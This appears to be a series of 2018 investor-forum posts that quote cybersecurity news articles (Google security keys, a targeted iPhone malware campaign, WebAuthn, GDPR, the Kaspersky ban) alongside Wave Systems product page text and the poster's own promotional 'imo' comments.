If you’ve been hacked in recent years, odds are you fell for that perfectly crafted phishing message in your email. Even the most mindful individuals can slip up, but Google’s employees have reportedly had a flawless security record for more than a year thanks to a recent policy requiring them to use physical security keys.
Krebs on Security reports that in early 2017, Google started requiring its 85,000 employees to use a security key device to handle two-factor authentication when logging into their various accounts. Rather than just having a single password, or receiving a secondary access code via text message (or an app such as Google Authenticator), the employees had to use a traditional password as well as plug in a device that only they possessed. The results were stellar. From the report:
A Google spokesperson said Security Keys now form the basis of all account access at Google.
“We have had no reported or confirmed account takeovers since implementing security keys at Google,” the spokesperson said. “Users might be asked to authenticate using their security key for many different apps/reasons. It all depends on the sensitivity of the app and the risk of the user at that point in time.”
A Google spokesperson confirmed that statement when reached by Gizmodo.
Obviously, Google employees are a prime target for hackers. Even successfully phishing a low-level worker can provide just enough access to get into sensitive systems or provide a jumping off point to target an employee with deeper access. So, when Google says it weathered perhaps thousands of attacks over a year without any known incident, it’s worth perking up and paying attention.
You probably already use two-factor authentication for at least some of your accounts, and if not you certainly should. The idea is that an extra step has to be taken by anyone trying to access an account. For example, if you just had to click that shady link in your inbox and accidentally handed over your Gmail password to a hacker, they’d still need to get the code from a text message or authenticator app to get in to your account. Before implementing the physical security key requirement, Google employees used Google Authenticator for that second layer of protection.
Last year, the company took things a step further with Universal 2nd Factor Authentication (U2F) via a device like the popular USB YubiKey. Even those text message codes sent to your phone can be hijacked by a determined hacker, but a Security Key has to be physically inserted into the machine you’re using. If a hacker really wanted to get into your files, they’d have to get their hands on the device itself.
Until we figure out a better alternative to passwords, U2F is one of the best options to protect yourself. Unfortunately, it isn’t available everywhere. It just so happens to work in Google’s Chrome browser, so there’s the good PR angle. But it can also be manually configured in Firefox. It can be used for apps like Facebook and password managers like LastPass, as well.
Yubico and Feitian are both trusted manufacturers of security key hardware if you’re looking to start using U2F in your day-to-day life. You can read more about getting everything set up right here.
https://www.wavesys.com/products/wave-virtual-smart-card
Get better security at less than half the cost
Passwords are weak. Tokens are expensive. Don’t compromise on security or price.
Wave Virtual Smart Card does anything your physical smart cards and tokens do, but it starts with hardware you already have: the Trusted Platform Module (TPM), a hardware security chip built into the motherboard of most business-class PCs. You may not even know you have it, but once you do, the TPM can be used in a myriad of ways. Wave turns it into a smart card, embedded directly into your laptop.
What can it be used for?
What do you use your smart card for today? With the exception of keying open the door at work, Wave Virtual Smart Card can perform any of the services or applications you rely on your smart card for today. Secure VPN, WiFi, remote desktop, cloud applications – it can all be done with a virtual smart card.
One helpdesk call you'll never get: "I lost my virtual smart card again..."
There are so many ways to lose a token – couch cushions, street drains, curious toddlers. In fact, up to 30% of all tokens are eventually lost. It’s much harder to lose a laptop, and you notice a lot faster when you do.
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
What will you do with >50% TCO savings?*
Tokens and smart cards require an additional hardware purchase, plus the time and money to ship to remote users. Use something that’s already in the users’ hands (the TPM), and your acquisition and deployment costs are lower.
Then consider the management savings in not having to replace lost and stolen tokens. That means fewer helpdesk calls, less interruption of user productivity, and fewer acquisition and shipping costs.
When we say “secure”…
…we mean it. Our solution starts with a proven hardware root-of-trust. Multi-factor authentication is an established best-practice for strong authentication: the TPM-based virtual smart card is one factor (something you have) and the user PIN is a second factor (something you know).
================================================================
The Google security keys can be lost and if the backup plan has any security deficiencies, hackers can exploit that.
What Can You do With the Trusted Platform Module (TPM)?
https://trustedcomputinggroup.org/what-can-you-do-with-the-trusted-platform-module-tpm/
Other article, "Watch a Hacker Install a Firmware Backdoor on a Laptop in Less than 5 minutes" requires a subscription from Motherboard (interesting article). The TCG article mentions that computers with Windows 8 and secure boot turned on are less susceptible to an "evil maid attack." I believe also that evil maid attacks can be thwarted by computers with SEDs. imo.
Much has been made about what exactly can be accomplished with the Trusted Platform Module, or TPM. Now that Windows 8 is available, that question becomes easy: lots can be done with the TPM to ensure better system, data and network security.
One key use is authentication – a topic that is seeing lots of interest these days with recent moves by Apple, Google and others to implement stronger authentication.
At last month’s RSA conference, TCG member Wave Systems showed effective strong authentication using the embedded TPM and Windows 8.
With Windows 8 a new environment for security solution providers to utilize for PBA has arrived: UEFI. The Unified Extensible Firmware Interface (UEFI) is a specification that defines a software interface between an operating system and platform firmware. UEFI is meant as a replacement for the Basic Input/Output System (BIOS) firmware interface, present in all Windows-based personal computers.* When UEFI Secure Boot is turned on it means that the PBA software has to be ‘signed’ by Microsoft or the OEM so that it can be trusted to execute. With Secure Boot turned on computers are less susceptible to attacks on the booting process such as the Evil Maid attack.
The TPM also can be used to monitor the security and health of the PC boot environment. For example, Wave Endpoint Monitor (WEM) determines the health of the endpoint based on TPM-secured Platform Configuration Register (PCR) measurements. In this demo, a “healthy” laptop is granted access to Wave Cloud. When WEM detects a suspicious change on the laptop – for example, by a firmware virus – the laptop is denied access to Wave Cloud.
Great, Now Facebook Is Investigating Potential Data Misuse by Something Called 'Crimson Hexagon'
Wave's Scrambls could have benefited Facebook and Twitter users in a big way. It could be a great tool for Facebook and Twitter users to 'scrambl' posts for the public that is not part of their inner circle. imo.
https://gizmodo.com/great-now-facebook-is-investigating-potential-data-mis-1827773950
Facebook may have stumbled through its Cambridge Analytica user privacy scandal largely unscathed so far—the yet-to-be-determined outcome of four separate federal investigations notwithstanding—but its pivot to publicly talking a big game on cracking down on data misuse continues.
Now Facebook has suspended another data analysis firm that received user data, this time with a name that sounds suspiciously like an evil corporation from a 1980s-era Kurt Russell movie: Crimson Hexagon. According to the Wall Street Journal, the company has secured at least 22 separate federal contracts since 2014 worth more than $800,000, including for the State Department, the Federal Emergency Management Agency, and the Secret Service, as well as a separate contract with a Russian nonprofit called the Civil Society Development Foundation.
Crimson Hexagon aggregates large amounts of public posts from sites like Facebook and Twitter for purposes like measuring public sentiment around a range of issues, and according to the WSJ, claims to have assembled a trillion-post archive. For example, the paper reported it attempted (but failed) to procure a Defense Department contract monitoring the terror group ISIS online. Its Russian contract was to measure the popularity of Vladimir Putin; another contract in Turkey informed the Recep Tayyip Erdogan-led government’s “decision in 2014 to briefly shut down Twitter amid public dissent,” the WSJ wrote, citing sources familiar with the company.
While the WSJ wrote Facebook is suspending the Boston-based company while it determines whether the government contracts violated its terms, it is not currently believed the firm gained access to private data like Cambridge Analytica:
Crimson Hexagon operates with little oversight from Facebook once it pulls public data from the social-media platform, according to more than a dozen people familiar with the business. The government contracts weren’t approved by Facebook in advance, for example, the people said.
Facebook, in response to questions from The Wall Street Journal this week about its oversight of Crimson Hexagon’s government contracts and storing of user data, said Friday it wasn’t aware of some of the contracts. On Friday, it said it was suspending Crimson Hexagon’s apps from Facebook and its Instagram unit, and launching a broad inquiry into how Crimson Hexagon collects, shares and stores user data.
Also concerning is a 2016 incident in which Crimson Hexagon suddenly began receiving private Instagram posts while downloading public Facebook ones “because of what Crimson Hexagon employees assumed was a software glitch on Facebook’s part”—something that certainly sounds like a major screwup.
Twitter also worked with Crimson Hexagon, the paper wrote. Unlike with Facebook, where data is freely provided to developers, the company paid Twitter for direct access to its “fire hose,” a premium version of its API that guarantees access to all tweets matching specific criteria. That means Crimson Hexagon gets more useful data from Twitter than Facebook, the WSJ added, but Twitter reportedly killed a potential contract with Immigration and Customs Enforcement over concerns on how the data might be used.
Facebook banned the use of its data for government surveillance in March 2017, per the BBC, though Crimson Hexagon’s other deals have included work with Adidas, Samsung, and the BBC itself.
“We don’t allow developers to build surveillance tools using information from Facebook or Instagram,” a Facebook spokesperson told CNN Money. “We take these allegations seriously, and we have suspended these apps while we investigate.”
In a blog post, Crimson Hexagon’s Chris Bingham emphasized that the company only pulls public posts, that government contracts are a minority of its work, that it only uses the data for purposes allowed by platforms, and “under no circumstances is surveillance a permitted use case.”
As noted by TechCrunch, unlike Cambridge Analytica, which worked to obfuscate its connection to a shady network of other companies and allegedly hired foreign contractors to work on US elections in what was possibly an illegal scheme, “Crimson Hexagon is more above the board, with ordinary venture investment and partnerships.”
Mysterious malware campaign targets just 13 iphones in India
Can there be any doubt that this has occurred or will occur on Android phones as well? Wave Endpoint Monitor could potentially help out in this situation. imo. see previous post below.
https://investorshub.advfn.com/boards/read_msg.aspx?message_id=142196498
https://www.cyberscoop.com/mysterious-malware-campaign-targets-just-13-iphones-india/
An application-warping malware campaign in India is aimed at just 13 iPhones in what researchers are calling a “highly targeted” operation.
The attackers are using an open-source mobile device management (MDM) server to distribute the malware through popular apps like Telegram and WhatsApp, researchers from Talos, Cisco’s threat intelligence unit, revealed Thursday. The use of MDM, a popular enterprise tool for administering mobile apps, allows hackers to control how their malware is interacting with the target phones.
“This campaign is of note since the malware goes to great lengths to replace specific mobile apps for data interception,” researchers Warren Mercer, Paul Rascagneres, and Andrew Williams wrote in a blog post.
The researchers don’t know who was targeted in the campaign, who carried out the attack, or why. While the hackers apparently tried to plant a “false flag” by posing as Russian, evidence suggests they were operating in India, according to Talos.
The malicious code injected into the apps can collect and exfiltrate phone and serial numbers, location, contacts, and Telegram and WhatsApp messages. The iPhone users are likely lured into enrolling in the MDM service through a social engineering campaign, according to the researchers. Each step of the enrollment process requires interacting with the user, such as installing a certificate authority on the iPhone.
Apple has revoked 5 certificates linked with the campaign, according to the researchers.
“The likely use of social engineering to recruit devices serves as a reminder that users need to be wary of clicking on unsolicited links and verify identities and legitimacy of requests to access devices,” they wrote.
The growing use of MDM at large organizations means users need to understand that installing additional certificates on devices can expose them to malicious activity, the researchers advised. “By installing a certificate outside of the Apple iOS trusted certificate chain, you may open up to possible third-party attacks like this,” they added.
It’s an open question as to why the malware, which the researchers say has been in use since August 2015, has gone after just 13 iPhones. Asked about this, a Talos spokesperson said that, for now, the researchers won’t be offering additional information beyond the blog post.
“Over a three-year period, the attackers remained under the radar — likely due to the low number of compromised devices,” the blog post states.
Pay-n-pray cybersecurity isn’t working. What if we just paid when it works?
https://www.digitaltrends.com/computing/bounty-based-cybersecurity-safety/
Not allowing bad guys on the network (see end of post) compared to the norm could be a relief to companies constantly having to put out fires (and potentially miss some) and be proof that Wave's TPM/ERAS product 'perform as designed'. Other Wave products perform better than competitors in the industry and this article discusses pay for performance which seems to be one of Wave's stronger suits. imo. This could change the way companies buy cybersecurity products. With companies spending billions of dollars on cybersecurity, isn't it time they find solutions that work; like Wave System's products!
Like home security, people would often rather not think about cybersecurity once they’ve paid for it. They’d rather pay and pray.
But how do you know when a security company’s software is working? With all the billions of dollars poured into protecting ourselves and our businesses online, why do hacks seem to be increasing in regularity and damages?
We spoke with Oren J. Falkowitz, a former senior-level employee at the NSA and United States Cyber Command, who has a radical idea for how cybersecurity companies should be making their money.
The problem
Our modern cybersecurity fiasco has many causes. Maybe it’s a lack of government funding and regulation. Maybe it’s large tech corporations not caring enough about privacy. Maybe it’s just a matter of educating the public and explaining in simple terms what’s at stake.
Falkowitz has a different take. He believes the real problem is that cybersecurity profits aren’t tied to performance. “For us, it means performance-based cybersecurity and paying for results, not a failure,” he told Digital Trends. “Companies should pay for cybersecurity only when and if it performs as designed.”
That’s not how it works today. Cybersecurity experts, companies, and antivirus software are presented and purchased like an insurance plan. You pay monthly and hope that nothing bad happens. If it does, they’ll help you pick up the pieces — and maybe try to upsell you on more security.
Area 1 Security, Falkowitz’ own cybersecurity company, takes the opposite approach. Area 1 calls out the fact that people “commit to security contracts running three to five years, spending six or seven figures. But they still don’t get what they pay for.” Falkowitz believes clients should pay only for attempted crimes that are stopped. It’s an idea similar to bug bounty programs, which encourage hackers to find – and then disclose – vulnerabilities
“Companies spend about $93 billion on cybersecurity, with no end in sight, and what’s worse, no end to the severity or frequency of cyber attacks,” Falkowitz said. “Performance-based and accountable cybersecurity will ensure that results are what drive the future innovations and successful outcomes in business models.”
You might wonder how a company could stay in business if it constantly had to prove to customers that attacks are being stopped. Area 1 Security makes it work by focusing its efforts on a particular aspect of cybersecurity — phishing.
It all leads back to phishing
“Phishing is the attack that starts the attack, it’s the root cause for an astounding 95 percent of all damages,” said Falkowitz. “The key to performance-based cybersecurity is stopping phishing.”
Phishing has become the bane of the internet’s existence. From malware to stolen data, phishing is often the entry point for the worst cyberattacks we’ve seen. It usually takes the form of a fraudulent email, sent to an unsuspecting victim under the guise of an official company or organization.
The email will then prompt the reader to click a link — and once they do, the attacker’s trap is triggered. Though simple, hackers have used phishing for everything from the Clinton campaign email debacle to the devastating 2017 WannaCry ransomware attack.
“Phishing is a socially-engineered attack that relies on authenticity to evade detection,” Falkowitz explained. “It’s designed not to be caught by anyone! That’s why it works so well. Besides being effective, it’s also incredibly cheap. That’s part of why it’s so good economically to be a bad guy on the internet. If you’re an attacker and you have something that works, that most companies can’t defend against, why not keep using it?”
Area 1 Security’s system claims to stop 99.99 percent of all phishing attacks, allowing them to keep a log of the attacks they’re preventing. Its philosophy isn’t to hunt down the criminals across the internet, but instead to stop the ones who are already knocking at our doors.
“Until we take phishing as a weapon out of the hands of attackers, we’ll continue on this increasingly dangerous and expensive trajectory.”
Maybe it’s time we started asking more from the companies that claim to protect us. After all, disarming the bad guys sounds like a much better plan than waiting for them to attack.
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Microsoft, Google, Facebook, Twitter Announce "Data Transfer Project"
The profiles mentioned in the article could be stored in the TPM and maybe somewhat similar to the OneName/Wave agreement way back in 2000 except TPMs are ubiquitous now. It seems that the 'Trust at the Edge' of the network paradigm could work more effectively in this situation now that TPMs are ubiquitous!
https://www.bleepingcomputer.com/news/technology/microsoft-google-facebook-twitter-announce-data-transfer-project/
Facebook, Google, Microsoft, and Twitter have announced on Friday, July 20, the Data Transfer Project (DTP), an initiative to create an open-source, service-to-service data portability platform so that users of their sites and others can easily migrate data from one platform to another.
After open-sourcing the code, the four tech giants hope that other platforms will adopt their new technology and help create an interconnected web where users can easily move data from platform to platform without headaches and avoid situations where they have to set up profiles over and over and over and over again at each site they register.
But the DTP framework is also useful for other things. For example, the four companies say, it could be leveraged to build tools and software to extract and back up data stored in social media profiles, or for creating tools that wipe out a user's social presence.
DTP leverages existing APIs
According to a scientific paper the four companies working on DTP released yesterday, the DTP framework will work on existing APIs and authorization mechanisms to access data to access and convert data into a common format and will require minimal modifications from participants.
Security features are baked in, and a governance body will also be created to oversee the framework's future development.
The DTP framework's source code is available on GitHub.
DTP already supports a few export types, online platforms
"Our prototype already supports data transfer for several product verticals including: photos, mail, contacts, calendar, and tasks. These are enabled by existing, publicly available APIs from Google, Microsoft, Twitter, Flickr, Instagram, Remember the Milk, and Smugmug," said Brian Willard, Software Engineer and Greg Fair, Product Manager at Google.
"For people on slow or low bandwidth connections, service-to-service portability will be especially important where infrastructure constraints and expense make importing and exporting data to or from the user’s system impractical if not nearly impossible," said Craig Shank, Vice President for Corporate Standards at Microsoft.
"These are the kinds of issues the Data Transfer Project will tackle. The Project is in its early stages, and we hope more organizations and experts will get involved," said Steve Satterfield, Privacy & Public Policy Director at Facebook.
"This will take time but we are very excited to work with innovators and passionate people from other companies to ensure we are putting you first," said Damien Kieran, Data Protection Officer at Twitter.
How Web Authentication May Change the Future of Passwords
Shouldn't Web Authentication or similar products have the premier TPM management company (Wave) and its product ESC/ETS used to help manage the TPM?
https://www.programmableweb.com/news/how-web-authentication-may-change-future-passwords/how-to/2018/07/19
Using WebAuthn or Web Authentication clients can be verified with their phones, hardware keys, or trusted devices. In his article, Nick Steele explains the new standards in web authentication, followed by registration and authentication where you’ll find PIN and biometrics access methods, then he comments how web browsers use a credential manager API.
Web Authentication
Trusted platform module devices that secure hardware through crypto keys and mobile phones are two of the many ways to authenticate via the web. Users can be authorized by fingerprints with biometric verification, although additional bio methods exist like retina and iris patterns, hand geometry, earlobe geometry, voice waves, and DNA. When a customer is accessed via web, passwords no longer will be necessary.
Registration
When a user registers, the created credential confirms to the web app owner that access is granted. This method replaces ordinary U2F cases, in which one security key instantly validates user presence. U2F is used by Facebook, Gmail, Dropbox, Salesforce.com, and GitHub. Think about the times when you’ve confirmed identity to Gmail by entering a number they send you via text message on your phone.
The author clarifies registration with an example: A user visits the website cat-facts.com from a laptop, registering for an account. By pressing the registration button, a prompt on their phone says “Register with cat-facts.com.” When they accept the request, the user could use a PIN or a biometric action (like a fingerprint) that will be linked to the created account. This action will display a confirmation: “Registration complete!” This user is now registered and the system has recorded the authorization gesture for future access.
The same image the author shares makes me think on my phone when I download an app from the App store.
Authentication
The credential created by the user is a keypair, a public key associated to a private key. The device the user is trying to authenticate will send verification data to prove user identity. When the user confirms presence, the data will be returned signed by the credential private key, authenticating the user to the device.
To demonstrate WebAuthn, let’s imagine a user registered a second account at the site example.com and the person is browsing on a phone. As the user types the address example.com, the option to login is chosen and two accounts will be displayed. The user will select the account and then prompted to enter a PIN or a biometric authentication linked to the account.
Credential manager API and… the end of passwords?
WebAuthn aims to provide biometric multi-factor authentication unique, like a fingerprint from a smartphone, voice, or retina. Eye verification would be from a short range distance, although an iris scanner that captures an eye from 40 feet away has been already developed by the Carnegie Mellon University College of Engineering. The idea is to authenticate with particular traits to increase security and replace passwords.
WebAuthn currently only supports two-factor authentication that in most cases include username and password in addition to authentication via smartphone. If a biometric verification is not accessible, entering a PIN can work because still, it will be browser-protected by Google, Microsoft, and Firefox. Verification stored by browsers could be handled by a Credential Manager API that Google uses in Chrome. As W3 defines, the API enables a website to request a user’s credentials from a user agent, helping the user agent correctly store user credentials for future use.
The end of passwords is not near yet. The author predicts Firefox and Google could release the WebAuthn API within the next months.
He has developed a web app in Go hosted on GitHub to demonstrate how WebAuthn registration and authentication work. You can try out the code via webauthn.io, a Firefox Night Build.
https://www.wavesys.com/products/embassy-security-center
This puts the endpoint in endpoint security
A key piece of the Wave alternative, Wave’s EMBASSY® Security Center is what lets you manage all the functions of your Trusted Platform Modules (TPMs) and self-encrypting drives (SEDs)—hardware security features already embedded in most business-class PCs and tablets. When installed on each of your desktops, laptops, tablets, and so on, this feature-rich software carries out the commands you issue remotely with our EMBASSY server products.
Key Features:
Easy security compliance
• When your endpoints are secure and reporting is in place, you’ve got compliance covered
Data protection
• Configure your VPN so that only authorized machines can access it from the outside
• Multi-factor authentication options include any combination of individual passwords, a master password, biometrics, smart cards, or a TPM PKI certificate
• Easy backup and recovery of TPM keys in case of malfunction of the TPM, motherboard, or hard drive
• Enables hardware-based pre-boot authentication to the encrypted hard drive (if equipped)
Simplicity
• Central management of security policies at the machine and user levels via our EMBASSY Remote Administration Server
• Deploy TPMs from multiple manufacturers using a single management system
• Deploy SEDs in minutes that integrate seamlessly with single sign-on (SSO) to Windows and Windows password synchronization
No compromises
• More security without more passwords to remember
• Your devices will perform just the same—our software makes them safer, not slower
Windows 8 Compatibility
• Compatible with Windows 8.1, 8, 7 and Vista operating systems – manage mixed environments from one console
• ESC supports Windows 8 Pro & Enterprise tablets so the same tools can secure all your enterprise endpoints
Application development
• Accelerate your application development, determine compatibility of your application and the TPM by using Wave’s Cryptographic Service Provider or Key Storage Provider, both included with the Embassy Security Center
Only 20% of companies have fully completed their GDPR implementations
https://www.helpnetsecurity.com/2018/07/16/complete-gdpr-implementation/?utm_source=twitter&utm_medium=social&utm_campaign=corpcomms&utm_content=industry-news
Key findings from a survey conducted by Dimensional Research highlight that only 20% of companies surveyed believe they are GDPR compliant, while 53% are in the implementation phase and 27% have not yet started their implementation.
EU (excluding UK) companies are further along, with 27% reporting they are compliant, versus 12% in the U.S. and 21% in the UK. While many companies have significant work to do, 74% expect to be compliant by the end of 2018 and 93% by the end of 2019.
While many companies still have a long way to go, a comparison to August 2017 research shows significant progress in the past ten months. The number of companies whose GDPR implementation is under way or completed increased from 38% to 66% in the U.S. and from 37% to 73% in the UK.
The cost of compliance is high
•27% of companies spent over half a million dollars each to become GDPR compliant
•31% of companies plan to spend over half a million dollars each on GDPR compliance efforts between June and December 2018
•18% of US companies spent over 1 million dollars each on compliance versus 8% for UK and 8% for EU companies.
Most companies are positive about GDPR
Despite difficulties in becoming GDPR compliant, 65% view GDPR as having a positive impact on their business. Only 15% view the GDPR as having a negative impact on their business
Customer expectations and complexity top GDPR drivers
•Meeting customer expectations (57%) was the main driver to become compliant, significantly higher than concern for fines (39%)
•Complexity of GDPR posed the biggest challenge to comply.
GDPR will continue to drive privacy investments
•87% indicate that data privacy will become more important at their companies post the GDPR deadline
•80% of companies plan to increase their spending on GDPR technology and tools to maintain compliance.
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Enterprises choose Wave to manage SEDs
Why? From our single console, you can manage all your organization’s self-encrypting drives (SEDs) easily and remotely, whether they number in the hundreds, or hundreds of thousands.
SEDs are the most secure, best-performing and most transparent encryption option for protecting data on laptops. These drives automatically encrypt all data written to the drive, so you don’t have to decide what’s important enough to encrypt. They also perform this encryption in the hardware of the drive, so you don’t end up with the performance issues software full-disk encryption is infamous for. SEDs are available as HDD or SSD, and are sold by most major drive manufacturers.
Wave’s management solution delivers remote drive initialization, user management, drive locking, user recovery and crypto-erase for all Opal-based, proprietary and solid-state SEDs.
Easy proof of compliance
Your encryption is only as good as you can prove it to be. To comply with most data protection regulations, your organization has to prove encryption was in place at the time of a potential breach. Wave provides secure audit logs to help you demonstrate compliance.
If you lose a device with a Wave-managed SED, there’s no wondering or guessing. You know encryption was on by default, and you can prove it.
No vendor lock-in
SED technology was created and standardized by a consortium of the best in the infosec industry, a standards body called the Trusted Computing Group (TCG). This means you can buy your drives wherever you want, from whatever vendor you want—any SED built to the TCG’s Opal specification can be managed by Wave.
No SEDs yet? No problem.
If your organization hasn’t yet deployed SEDs, you can skip the process of retro-fitting and simply incorporate SEDs on all new laptops as part of your regular refresh cycle. In the meantime, the same Wave console can manage BitLocker and SEDs, so you can protect the devices you have now with BitLocker and add those with SEDs as they are deployed. And if you’re using Wave’s cloud platform, you can also support OSX FileVault2.
Pick your platform
Wave SED management is available via the cloud or on-premise servers. Ask us for more details about which platform is right for your deployment.
https://www.wavesys.com/products/wave-virtual-smart-card
Wave could have a big impact in getting companies GDPR compliant. imo.
If Your Weapons Aren’t Cyber-Hardened, Expect to Lose Pentagon Contracts
https://www.defenseone.com/business/2018/07/if-your-weapons-arent-cyber-hardened-expect-lose-pentagon-contracts/149783/
The Pentagon intends to start assessing its weapons’ resistance to hacks, instead of leaving that to manufacturers.
FARNBOROUGH, UK — The Pentagon could stop awarding contracts to companies whose weapons are deemed vulnerable to cyber attacks, according to senior U.S. Defense Department officials.
Today, companies are responsible for assessing whether their own products meet DoD cybersecurity standards.
“Because of a couple recent events, we realized that that is not good enough,” Kevin Fahey, the assistant secretary of defense for acquisition, said Monday during a briefing at the Farnborough Air Show.
In February, Deputy Defense Secretary Patrick Shanahan issued a stern warning to companies: protect your networks or risk losing business. In June, Chinese hackers allegedly stole sensitive submarine warfare information from a contractor’s computer.
Officials from the Pentagon’s acquisition, intelligence, chief information officer and research-and-engineering offices are creating a way to test the cyber defenses of weapons when assessing bids from companies. The effort is called “Delivered Uncompromised.”
“If you think about our weapon systems today, the IT infrastructure is a part of our weapon system,” Fahey said.
MITRE Corp., a research-and-development firm, conducted a study, which is “the baseline of where we’re starting from,” Fahey said after the briefing.
The MITRE report noted supply chain vulnerabilities, according to a person familiar with its findings, and made a series of recommendations, including making cyber hardening a “fourth pillar” of acquisition, along with cost, schedule and past performance.
The Pentagon has taken a number of steps in recent months to tighten its cyber defenses. In February, the Defense Science Board made a series of recommendations to improve the way the Pentagon buys software. Two months later, Ellen Lord, the undersecretary for acquisition and sustainment, tapped Jeff Boleng — a former Air Force cybersecurity operations officer — as her special assistant for software acquisition. The Pentagon is also assessing the cyber vulnerabilities of its weapons and infrastructure. The efforts are all intertwined, according to a source with insight into the projects.
“We have to develop a way that we evaluate people’s capability in cyber security almost as a go, no-go versus it’s a comparison between cost, schedule and performance and cyber,” Fahey said after the roundtable. “Cost, schedule, performance always end up being one, two and three [in terms of priority] and then if you’re the fourth, you’re not that important.”
Officials are considering using a grading system for cyber standards that similar to the way it assesses the maturity of software. They are also considering creating “red teams” that would test contractors cyber defenses. Another consideration is offering contractors government-certified cyber tools.
“We know it’s really serious now that we need to make that as a priority and then figure out how do we help the small businesses, Fahey said. “One of the ideas is almost us maybe being able to deliver them the IT infrastructure as [government furnished equipment] that is cyber secure. That is a high priority across the department.”
Today companies have to declare that they comply with federal acquisition regulations, “but we really don’t check it,” Fahey said. If a company does not meet the standards, it’s not a condition that could prevent them from being awarded a contract. “You just have to come up with a plan on how you’re going to meet it,” he said.
Officials believe that requiring cyber hardening as part of a weapon competition will force companies to better protect their systems.
“If it becomes a competitive differentiator, then what ends up happening is you’ve got every incentive in the world to meet that standard and to use it because it’s something that you need to be successful,” Eric Chewning, deputy assistant secretary of defense for manufacturing and industrial base policy, said in an interview.
Said Fahey: “The only way you make it serious to industry is you make it part of the competition
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs
Less Than Half of Cyberattacks Detected via Antivirus: SANS
see previous post for relevant information on Wave Endpoint Monitor. With so many companies still using traditional antivirus it would seem that a product like WEM could be just what these companies need.
https://www.darkreading.com/endpoint/less-than-half-of-cyberattacks-detected-via-antivirus-sans/d/d-id/1332309?_mc=KJH-Twitter-2018-07
Companies are buying next-gen antivirus and fileless attack detection tools but few have the resources to use them, researchers report.
Businesses are investing in more advanced endpoint security tools but don't have the means to properly implement and use them, according to a new report from the SANS Institute.
The SANS 2018 Survey on Endpoint Protection and Response polled 277 IT professionals on endpoint security concerns and practices. In this year's survey, 42% of respondents reported endpoint exploits, down from 53% in 2017. However, the number of those who didn't know they had been breached jumped from 10% in 2017 to 20% in 2018.
Traditional tools are no longer sufficient to detect cyberattacks, the data shows: Antivirus systems only detected endpoint compromise 47% of the time; other attacks were caught through automated SIEM alerts (32%) and endpoint detection and response platforms (26%).
Most endpoint attacks are intended to exploit users. More than 50% of respondents reported Web drive-by incidents, 53% pointed to social engineering and phishing attacks, and half cited ransomware. Credential theft was used in 40% of compromises reported, researchers state.
The majority (84%) of endpoint breaches involve more than one device, experts report. Desktops and laptops are still the top devices of concern, but attackers are also compromising server endpoints, cloud-based endpoints, SCADA, and other industrial IoT devices. Cloud-based endpoints are increasingly popular, going from just over 40% in 2017 to 60% in 2018.
Given the commonality and effectiveness of user-targeted attacks, it's worth noting that detection technologies designed to look at user and system behavior, or provide context awareness, were less involved in detecting breaches. Only 23% of breaches were found with attack behavior-modeling and only 11% were detected with behavior analytics.
Businesses aren't using these technologies as often because they lack the means, SANS reports. Many IT and security pros report investing in next-gen capabilities but not installing them. For example, half have acquired next-gen AV tools but 37% have not implemented them. Forty-nine percent have fileless attack detection tools but 38% haven't implemented the tech.
When breaches do occur it seems many businesses can trace them to the source. Nearly 80% of respondents report they can tie a user to endpoints and servers at least half the time (34% always, 45% at least half), which adds an identity when making decisions about user behavior.
Data collection makes a major difference in data breach remediation, but organizations don't always have access to the data they needed. Most (84%) respondents want more network access and user data, 74% want more network security data from firewall/IPS/unified threat management systems, and 69% want better network traffic analysis.
Government’s Kaspersky Ban Takes Effect
The government should look to have a better malware defense by incorporating Wave Endpoint Monitor. imo. Having Kaspersky banned should put more emphasis on using better anti-malware products like WEM. If only the right people really knew about WEM and other Wave products.
https://www.nextgov.com/cybersecurity/2018/07/governments-kaspersky-ban-takes-effect/149758/
Pentagon, GSA and NASA contracts will now officially prohibit Kaspersky software.
A new procurement rule took effect Monday barring the Russian anti-virus company Kaspersky Lab or any of its partners or distributors from contracts at the Pentagon, General Services Administration or NASA, despite a last-minute Kaspersky effort to halt the ban.
Kaspersky told a federal appeals court last week that the ban would cause the company “reputational and financial damage” and asked the court to temporarily halt the ban while it considers Kaspersky’s underlying legal challenge.
The U.S. Court of Appeals for the D.C. Circuit denied that request late Friday. The one-sentence ruling stated Kaspersky had “not satisfied the stringent requirements for an injunction pending appeal.”
The December 2017 congressional ban was sparked by intelligence agencies’ allegation that Kaspersky executives are too closely tied to the Kremlin and the Homeland Security Department’s conclusion that a Russian cybersecurity law might compel Kaspersky to help Russian intelligence agencies spy on the U.S. government.
Kaspersky has consistently denied any undue influence by the Kremlin and said the Homeland Security Department is misreading the Russian law.
Kaspersky told Nextgov in a statement that the company “is disappointed that the appellate court did not grant the company’s motion to stay … but remains hopeful that the court will find the law unconstitutional after full consideration of the case on the merits.”
Kaspersky’s broad legal argument against the U.S. ban is that Congress unfairly singled it out for punishment without sufficient legal process—what’s called a “bill of attainder.” A U.S. district court judge dismissed that claim in May, saying Congress’s goal was to protect national security, not to punish Kaspersky.
That’s the ruling Kaspersky is appealing.
Kaspersky software has already been scrubbed from all civilian government systems because of a separate ban imposed by Homeland Security in October. Government lawyers argued that meant it was pointless to stall the congressional ban because it would have no practical effect.
